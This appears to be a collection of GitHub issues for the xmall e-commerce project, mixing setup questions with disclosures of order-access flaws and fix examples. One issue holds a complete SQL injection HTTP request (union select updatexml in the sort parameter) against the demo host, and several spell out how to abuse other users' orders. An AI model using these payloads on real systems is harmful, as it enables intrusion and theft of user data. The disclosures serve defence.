exrick / xmall
A distributed e-commerce shopping mall based on an SOA architecture, with separated front end and back end. Storefront: the Vue stack. Back-office management system: Dubbo/SSM/Elasticsearch/Redis/MySQL/ActiveMQ/Shiro/Zookeeper, etc.
Home Page: http://xmall.exrick.cn
License: GNU General Public License v3.0
[item] IndexNotFoundException[no such index]
2019-10-12 09:39:48,654 [DubboServerHandler-172.21.63.129:20882-thread-15] [com.alibaba.dubbo.rpc.filter.ExceptionFilter]-[ERROR] [DUBBO] Got unchecked and undeclared exception which called by 172.21.63.129. service: cn.exrick.search.service.SearchService, method: search, exception: cn.exrick.common.exception.XmallException: 查询ES索引库出错, dubbo version: 2.6.1, current host: 172.21.63.129
cn.exrick.common.exception.XmallException: 查询ES索引库出错
at cn.exrick.search.service.impl.SearchServiceImpl.search(SearchServiceImpl.java:176)
Recently, our team found an arbitrary order cancel vulnerability in the latest version of the project.
The vulnerability logic is present in the file: https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L54
Unauthorized access to the /member/cancelOrder API enables attackers to manipulate the POST param order and cancel orders belonging to other users.
To address this vulnerability, we strongly recommend that developers implement access control policies to ensure that only privileged users or the order owner are authorized to perform the cancel operation.
On my side, I run npm run build and put the files from the dist directory into Tomcat; the front end by default requests the API at http://localhost:8080. But my back-end service is deployed on another machine.
Recently, our team found an arbitrary order free payment vulnerability in the latest version of the project. The vulnerability logic is located within the following file:
https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L70
Unauthorized access to the /member/payOrder API allows attackers to manipulate the POST parameter tbThanks, thereby altering the payment status of any order, resulting in unauthorized free payments.
To mitigate this vulnerability, we strongly recommend that developers implement access control policies to restrict changes to the payment status.
Recently, our team found an arbitrary order detail access vulnerability in the latest version of the project.
The vulnerability logic is present in the file:
https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L28
Access to the /member/orderList API is unauthorized, allowing attackers to manipulate the query param userId and access other users' order details, potentially compromising user privacy data.
To address this vulnerability, we strongly recommend that developers implement access control policies to ensure that only privileged users or the owner can access the order information.
[Suggested description]
Xmall was discovered to contain a SQL injection vulnerability via the orderDir parameter.
[Vulnerability Type]
SQLi
[Vendor of Product]
https://github.com/Exrick/xmall
[Affected Product Code Base]
all versions
[Affected Component]
[Attack Type]
Remote
[Vulnerability details]
Send the payload below to the interface /item/list
GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136 HTTP/1.1
Host: xmadmin.exrick.cn
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Referer: http://xmadmin.exrick.cn/product-list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,or;q=0.7
Cookie: JSESSIONID=359A406116392BB0456356EFBCF068FC
Connection: close
[Impact Code execution]
true
[Cause of vulnerability]
In the /item/list interface, the order[0][dir] parameter is not filtered and is passed into the getItemList function. Then it is passed into the selectItemByCondition function. In xmall-manager\xmall-manager-dao\src\main\java\cn\exrick\manager\mapper\TbItemMapper.xml, the orderDir parameter is used in ${} format, leading to a SQL injection vulnerability.
And there are other similar interfaces:
That's all, thanks.
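An added example, not code from the xmall project, of the allowlist check this report calls for: the DataTables order[0][column] and order[0][dir] values are mapped to server-chosen identifiers before anything is interpolated with ${} in the mapper. The column names, the Sort type and the validate() helper are assumptions made for this illustration.

```java
import java.util.Map;
import java.util.Set;

// Added example, not xmall's code. ${...} in a MyBatis mapper pastes the value
// into the SQL verbatim, so a sort column or direction taken from the request
// must be replaced by a server-chosen value before it reaches the mapper.
public final class SortParamGuard {

    public static final class Sort {
        public final String column, direction;
        private Sort(String column, String direction) { this.column = column; this.direction = direction; }
        @Override public String toString() { return column + " " + direction; }
    }

    // The browser sends a DataTables column index; the server maps it to a real
    // column name. These names are assumed for the example, not TbItemMapper.xml's.
    private static final Map<String, String> COLUMNS = Map.of(
            "0", "id", "1", "title", "2", "price", "3", "created", "4", "updated");
    private static final Set<String> DIRECTIONS = Set.of("asc", "desc");

    // Returns a Sort built only from allowlisted values, or null when a parameter
    // is missing or unknown; the caller then uses a fixed default ORDER BY.
    public static Sort validate(String columnIndex, String dir) {
        if (columnIndex == null || dir == null) return null;
        String column = COLUMNS.get(columnIndex.trim());
        String direction = dir.trim().toLowerCase();
        if (column == null || !DIRECTIONS.contains(direction)) return null;
        return new Sort(column, direction);
    }

    public static void main(String[] args) {
        System.out.println(validate("1", "desc"));    // title desc
        System.out.println(validate("1", "desc)a"));  // null: rejected before any SQL is built
        System.out.println(validate("9", "asc"));     // null: unknown column index
        // Only the validated Sort is handed to the mapper, e.g.
        //   ORDER BY ${sort.column} ${sort.direction}
        // while every data value (cid, search text, paging) stays in #{...}.
    }
}
```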
As titled.
Modifying the userId in the request lets you add items to other people's shopping carts or obtain other people's order information.
Visiting the storefront home page gives no response.
Recently, our team found an arbitrary order deletion vulnerability in the latest version of the project.
The vulnerability logic is present in the file: https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L62
Unauthorized access to the /member/delOrder API enables attackers to manipulate the query param orderId and delete orders belonging to other users.
To address this vulnerability, we strongly recommend that developers implement access control policies to ensure that only privileged users or the order owner are authorized to perform the delete operation.
Is your shopping cart item data stored directly in Redis without being persisted to MySQL? If so, is that reasonable?
update x set num = x where id = x and num = 原库存数
Recommended for a single table.
GET http://localhost:8888/lib/gt.js net::ERR_ABORTED
causes
$.ajax({
    url: '/geetestInit?t=' + (new Date()).getTime(), // add a random number to prevent caching
    type: "GET",
    dataType: 'json',
    success: function (data) {
        initGeetest({
            gt: data.gt,
            challenge: data.challenge,
            new_captcha: data.new_captcha, // used when the service is down to indicate this is a new captcha
            offline: !data.success, // indicates whether the back end detected that the Geetest server is down; usually not a concern
            product: "popup", // product form: float (click Chinese characters) or popup (slide)
            width: "100%"
        }, handler);
    }
});
to fail to initialize here.
Is this based on a single merchant or multiple merchants?
Is a small machine with 1G of memory enough to run the mall's front-end and back-end projects?
The mall's automatic email sending feature may be broken. I hope the author can send a copy of the monolithic version of xmall after seeing this; time is a bit tight, sorry for the trouble.
Recently, our team found an arbitrary order detail access vulnerability (different from #79) in the latest version of the project.
The vulnerability logic is present in the file:
https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L36
The developer failed to check the ownership of the order against the accessing user when querying the order details via orderService.getOrder(), allowing attackers to manipulate the query param orderId of API /member/orderDetail and access other users' order details, potentially compromising user privacy data.
To address this vulnerability, we strongly recommend that developers implement access control policies to ensure that only privileged users or the owner can access the order information.
Could you share any ideas on doing continuous integration? Right now, because the different modules don't have one overall pom.xml file, I'm stuck at the compilation step. Thanks.
Hi! Could I take a look at your database design?
After payment succeeds, is there no mini-program source code?
Many user-related operations have no permission checks. The token is basically unused in the project.
Being able to turn a video tutorial into an open-source project like this is truly impressive. Respect to the author 👍
Please share the source code of the back-office management system.
Recently, our team found an arbitrary order addition vulnerability in the latest version of the project.
The vulnerability logic is present in the file:
https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L46
Access to the /member/addOrder API is unauthorized, allowing attackers to add orders as any user via a crafted orderInfo object.
To address this vulnerability, we strongly recommend that developers implement access control policies to limit the order addition operation.
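An added example, not code from the xmall project, of the ownership check the order reports in this thread (orderList, orderDetail, cancelOrder, delOrder, payOrder, addOrder) ask for: the member identity is read from the server-side session, and every order is loaded and compared against it before it is returned or mutated. Order, OrderService, the orderId parameter and the "memberId" session attribute are assumptions made for this illustration.

```java
import java.util.List;
import javax.servlet.http.HttpSession;
import org.springframework.http.HttpStatus;
import org.springframework.web.bind.annotation.*;
import org.springframework.web.server.ResponseStatusException;
// Added example, not xmall's code: identity comes from the server-side session
// and each order is checked for ownership before it is read or changed.
@RestController
@RequestMapping("/member")
public class OwnedOrderController {
    public static final class Order {            // assumed minimal order record
        public final long id, userId;
        public Order(long id, long userId) { this.id = id; this.userId = userId; }
    }

    public interface OrderService {              // assumed persistence facade
        Order getOrder(long orderId);
        List<Order> listByUser(long userId);
        void cancel(Order order);
    }

    private final OrderService orderService;
    public OwnedOrderController(OrderService orderService) { this.orderService = orderService; }
    // The caller is whoever the login handler stored; a client-sent userId is never consulted.
    private static long currentMember(HttpSession session) {
        Long id = (Long) session.getAttribute("memberId");
        if (id == null) throw new ResponseStatusException(HttpStatus.UNAUTHORIZED, "login required");
        return id;
    }
    // Same 404 for "no such order" and "someone else's order", so order ids cannot be enumerated.
    static Order ownedOrder(OrderService svc, long memberId, long orderId) {
        Order order = svc.getOrder(orderId);
        if (order == null || order.userId != memberId) {
            throw new ResponseStatusException(HttpStatus.NOT_FOUND, "order not found");
        }
        return order;
    }

    @GetMapping("/orderList")
    public List<Order> list(HttpSession session) {
        return orderService.listByUser(currentMember(session));   // no userId query param at all
    }

    @GetMapping("/orderDetail")
    public Order detail(@RequestParam long orderId, HttpSession session) {
        return ownedOrder(orderService, currentMember(session), orderId);
    }

    @PostMapping("/cancelOrder")
    @ResponseStatus(HttpStatus.NO_CONTENT)
    public void cancel(@RequestParam long orderId, HttpSession session) {
        // delOrder and payOrder would gate on exactly the same check before mutating anything.
        orderService.cancel(ownedOrder(orderService, currentMember(session), orderId));
    }
}
```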
It shouldn't be a problem with my network.
Hi. The el-autocomplete search isn't implemented on the live site; is the feature incomplete?
I configured the ik tokenizer for Elasticsearch, but searching for products in the storefront does not support Chinese search.
{"success":false,"message":"你手速怎么这么快,请点慢一点","code":500,"timestamp":1545190498198,"result":null} What is this problem?
Switching to an older version of Firefox, it still works.
Could you take a look?
Hi
I found a security vulnerability in the XMALL application.
Where should I disclose it?
Thanks,
Ori.
This project will serve as the author's 2018 undergraduate graduation project and is being open-sourced ahead of time; please do not plagiarize it. After the graduation project is finished, deployment, detailed documentation, project architecture and other content will be completed.
org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'shiroFilter': Unsatisfied dependency expressed through field 'systemService'; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'systemService': FactoryBean threw exception on object creation; nested exception is java.lang.IllegalStateException: Failed to check the status of the service cn.exrick.manager.service.SystemService. No provider available for the service cn.exrick.manager.service.SystemService from the url zookeeper://127.0.0.1:2181/com.alibaba.dubbo.registry.RegistryService?application=xmall-manager-web&dubbo=2.6.1&interface=cn.exrick.manager.service.SystemService&methods=countLog,deleteLog,getLogList,updateBase,getWeekHot,getShiroFilter,countShiroFilter,addLog,addShiroFilter,getBase,updateShiroFilter,deleteShiroFilter&pid=42124&register.ip=169.254.135.39&revision=1.0-SNAPSHOT&side=consumer&timestamp=1529023738625 to the consumer 169.254.135.39 use dubbo version 2.6.
Hello, the search feature in the standalone version keeps reporting an error; has it been fixed?